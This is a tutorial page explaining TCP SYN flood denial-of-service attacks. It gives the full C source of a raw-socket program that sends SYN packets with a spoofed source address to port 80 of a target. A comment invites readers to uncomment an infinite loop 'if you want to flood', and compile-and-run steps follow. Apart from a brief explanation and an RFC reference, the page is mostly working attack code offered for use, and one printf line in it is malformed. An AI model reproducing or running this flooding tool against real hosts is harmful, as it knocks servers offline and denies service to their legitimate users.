SYN Flood DOS Attack with C Source Code

简介:

TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :

1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server

The above 3 steps are followed to establish a connection between source and destination.

SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.

Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.

For more information on TCP Syn DOS attack read up rfc 4987 , titled “TCP SYN Flooding Attacks and Common Mitigations”
over here

Below is an example code in c :

Code

1 /*
2     Syn Flood DOS with LINUX sockets
3 */
4 #include<stdio.h>
5 #include<string.h> //memset
6 #include<sys/socket.h>
7 #include<stdlib.h> //for exit(0);
8 #include<errno.h> //For errno - the error number
9 #include<netinet/tcp.h>   //Provides declarations for tcp header
10 #include<netinet/ip.h>    //Provides declarations for ip header
11  
12 struct pseudo_header    //needed for checksum calculation
13 {
14     unsigned int source_address;
15     unsigned int dest_address;
16     unsigned char placeholder;
17     unsigned char protocol;
18     unsigned short tcp_length;
19      
20     struct tcphdr tcp;
21 };
22  
23 unsigned short csum(unsigned short *ptr,int nbytes) {
24     register long sum;
25     unsigned short oddbyte;
26     register short answer;
27  
28     sum=0;
29     while(nbytes>1) {
30         sum+=*ptr++;
31         nbytes-=2;
32     }
33     if(nbytes==1) {
34         oddbyte=0;
35         *((u_char*)&oddbyte)=*(u_char*)ptr;
36         sum+=oddbyte;
37     }
38  
39     sum = (sum>>16)+(sum & 0xffff);
40     sum = sum + (sum>>16);
41     answer=(short)~sum;
42      
43     return(answer);
44 }
45  
46 int main (void)
47 {
48     //Create a raw socket
49     int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
50     //Datagram to represent the packet
51     char datagram[4096] , source_ip[32];
52     //IP header
53     struct iphdr *iph = (struct iphdr *) datagram;
54     //TCP header
55     struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
56     struct sockaddr_in sin;
57     struct pseudo_header psh;
58      
59     strcpy(source_ip , "192.168.1.2");
60    
61     sin.sin_family = AF_INET;
62     sin.sin_port = htons(80);
63     sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
64      
65     memset (datagram, 0, 4096); /* zero out the buffer */
66      
67     //Fill in the IP Header
68     iph->ihl = 5;
69     iph->version = 4;
70     iph->tos = 0;
71     iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
72     iph->id = htonl (54321); //Id of this packet
73     iph->frag_off = 0;
74     iph->ttl = 255;
75     iph->protocol = IPPROTO_TCP;
76     iph->check = 0;      //Set to 0 before calculating checksum
77     iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
78     iph->daddr = sin.sin_addr.s_addr;
79      
80     iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
81      
82     //TCP Header
83     tcph->source = htons (1234);
84     tcph->dest = htons (80);
85     tcph->seq = 0;
86     tcph->ack_seq = 0;
87     tcph->doff = 5;      /* first and only tcp segment */
88     tcph->fin=0;
89     tcph->syn=1;
90     tcph->rst=0;
91     tcph->psh=0;
92     tcph->ack=0;
93     tcph->urg=0;
94     tcph->window = htons (5840); /* maximum allowed window size */
95     tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
96                 should fill in the correct checksum during transmission */
97     tcph->urg_ptr = 0;
98     //Now the IP checksum
99      
100     psh.source_address = inet_addr( source_ip );
101     psh.dest_address = sin.sin_addr.s_addr;
102     psh.placeholder = 0;
103     psh.protocol = IPPROTO_TCP;
104     psh.tcp_length = htons(20);
105      
106     memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
107      
108     tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
109      
110     //IP_HDRINCL to tell the kernel that headers are included in the packet
111     int one = 1;
112     const int *val = &one;
113     if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
114     {
115         printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" errnostrerror(errno));
116         exit(0);
117     }
118      
119     //Uncommend the loop if you want to flood :)
120     //while (1)
121     //{
122         //Send the packet
123         if (sendto (s,      /* our socket */
124                     datagram,   /* the buffer containing headers and data */
125                     iph->tot_len,    /* total length of our datagram */
126                     0,      /* routing flags, normally always 0 */
127                     (struct sockaddr *) &sin,   /* socket addr, just like in */
128                     sizeof (sin)) < 0)       /* a normal send() */
129         {
130             printf ("error\n");
131         }
132         //Data send successfully
133         else
134         {
135             printf ("Packet Send \n");
136         }
137     //}
138      
139     return 0;
140 }

Compile and Run

On Ubuntu

1 $ gcc synflood.c
2 sudo ./a.out
3 Packet Send

Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.

目录
相关文章
|
6月前
|
安全 测试技术 区块链
智能合约中短地址攻击(Short Address Attack)
智能合约中短地址攻击(Short Address Attack)
80 7
doubango TURN Data Indication报文代码
doubango TURN Data Indication报文代码
81 0
|
网络协议 网络安全 网络架构
IPV6错误: IP is not ICMP pingable. Please make sure ICMP is not blocked. If you are blocking ICMP
IPV6错误: IP is not ICMP pingable. Please make sure ICMP is not blocked. If you are blocking ICMP
220 0
|
网络协议 安全 Linux
|
网络协议 Ubuntu 网络安全
WARNING: POSSIBLE DNS SPOOFING DETECTED!
在 win10 系统中,首次提交项目代码到公司内部 GitLab 远程仓库,出现 WARNING: POSSIBLE DNS SPOOFING DETECTED! 错误,如上图 因为我们的远程仓库是没问题的,在Ubuntu系统里日常代码提交都正常,根据错误描述提示,分析应该是 known_hosts 文件中的内容 [git.sg-ai.com]:2289 改变导致.
388 0
WARNING: POSSIBLE DNS SPOOFING DETECTED!
|
数据安全/隐私保护
抓包工具Wireshark报错“the capture session could not be initiated on interface”
抓包工具Wireshark报错“the capture session could not be initiated on interface”
Network is unreachable错误+From localhost (192.168.81.129) icmp_seq=1 Destination Host Unreachable错误
本文均为本人实操整理,请勿搬运,学习交流可以随时评论---魏红斌
568 0